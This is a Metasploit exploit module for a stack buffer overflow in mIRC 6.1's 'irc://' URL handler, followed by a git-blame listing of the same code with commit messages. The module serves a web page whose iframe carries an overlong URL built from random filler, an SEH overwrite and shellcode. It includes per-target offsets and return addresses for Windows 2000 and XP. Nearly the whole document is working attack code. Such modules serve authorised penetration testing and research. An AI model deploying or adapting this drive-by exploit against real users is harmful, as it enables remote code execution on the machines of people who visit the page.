modules/exploits/windows/browser/mirc_irc_url.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'mIRC IRC URL Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in mIRC 6.1. By
        submitting an overly long and specially crafted URL to
        the 'irc' protocol, an attacker can overwrite the buffer
        and control program execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         => 'MC',
      'References'     =>
        [
          [ 'CVE', '2003-1336'],
          [ 'OSVDB', '2665'],
          [ 'BID', '8819' ],
        ],

      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },

      'Payload'        =>
        {
          'Space'    => 400,
          'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets'        =>
        [
          [ 'Windows 2000 Pro English All',   { 'Offset' => 1442, 'Ret' => 0x75022ac4 } ],
          [ 'Windows XP Pro SP0/SP1 English', { 'Offset' => 1414, 'Ret' => 0x71aa32ad } ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2003-10-13',
      'DefaultTarget'  => 0))
  end

  def on_request_uri(cli, request)
    # Re-generate the payload
    return if ((p = regenerate_payload(cli)) == nil)

    filler =  rand_text_alphanumeric(target['Offset'], payload_badchars)
    seh    = generate_seh_payload(target.ret)
    sploit = filler + seh

    # Build the HTML content
    content = "<html><iframe src='irc://#{sploit}'></html>"

    print_status("Sending #{self.name}")

    # Transmit the response to the client
    send_response_html(cli, content)

    # Handle the payload
    handler(cli)
  end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = NormalRanking`
added exploit module mirc_irc_url.rb 2006-11-03 19:35:42 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::HttpServer::HTML`
			`include Msf::Exploit::Remote::Seh`
added exploit module mirc_irc_url.rb 2006-11-03 19:35:42 +00:00
			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'mIRC IRC URL Buffer Overflow',`
			`'Description' => %q{`
stop perpetuating the ambiguity! 2010-05-09 17:45:00 +00:00			`This module exploits a stack buffer overflow in mIRC 6.1. By`
added exploit module mirc_irc_url.rb 2006-11-03 19:35:42 +00:00			`submitting an overly long and specially crafted URL to`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`the 'irc' protocol, an attacker can overwrite the buffer`
added exploit module mirc_irc_url.rb 2006-11-03 19:35:42 +00:00			`and control program execution.`
			`},`
			`'License' => MSF_LICENSE,`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`'Author' => 'MC',`
			`'References' =>`
added exploit module mirc_irc_url.rb 2006-11-03 19:35:42 +00:00			`[`
OSVDB reference update from Steve Tornio 2009-10-12 14:39:51 +00:00			`[ 'CVE', '2003-1336'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '2665'],`
added exploit module mirc_irc_url.rb 2006-11-03 19:35:42 +00:00			`[ 'BID', '8819' ],`
			`],`

			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'process',`
			`},`

			`'Payload' =>`
			`{`
			`'Space' => 400,`
			`'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",`
			`'StackAdjustment' => -3500,`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[ 'Windows 2000 Pro English All', { 'Offset' => 1442, 'Ret' => 0x75022ac4 } ],`
			`[ 'Windows XP Pro SP0/SP1 English', { 'Offset' => 1414, 'Ret' => 0x71aa32ad } ],`
			`],`
			`'Privileged' => false,`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2003-10-13',`
added exploit module mirc_irc_url.rb 2006-11-03 19:35:42 +00:00			`'DefaultTarget' => 0))`
			`end`

			`def on_request_uri(cli, request)`
			`# Re-generate the payload`
			`return if ((p = regenerate_payload(cli)) == nil)`

updated modules to use base class rand_xxx methods 2007-03-01 08:21:36 +00:00			`filler = rand_text_alphanumeric(target['Offset'], payload_badchars)`
added exploit module mirc_irc_url.rb 2006-11-03 19:35:42 +00:00			`seh = generate_seh_payload(target.ret)`
			`sploit = filler + seh`

			`# Build the HTML content`
			`content = "<html><iframe src='irc://#{sploit}'></html>"`

Remove spurious cli.peerhost in output 2012-04-20 13:31:42 -06:00			`print_status("Sending #{self.name}")`
added exploit module mirc_irc_url.rb 2006-11-03 19:35:42 +00:00
			`# Transmit the response to the client`
API change for the HTML mixin, the send_response method is no longer overloaded, instead exploits must call send_response_html to enable HTML evasion. The old method caused problems when a exploit needed HTML and non-HTML response capabilities 2006-12-10 03:26:53 +00:00			`send_response_html(cli, content)`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
Consistent use of handler(cli) after the payload is sent to the user 2007-04-04 04:34:17 +00:00			`# Handle the payload`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`handler(cli)`
added exploit module mirc_irc_url.rb 2006-11-03 19:35:42 +00:00			`end`
OSVDB reference update from Steve Tornio 2009-10-12 14:39:51 +00:00			`end`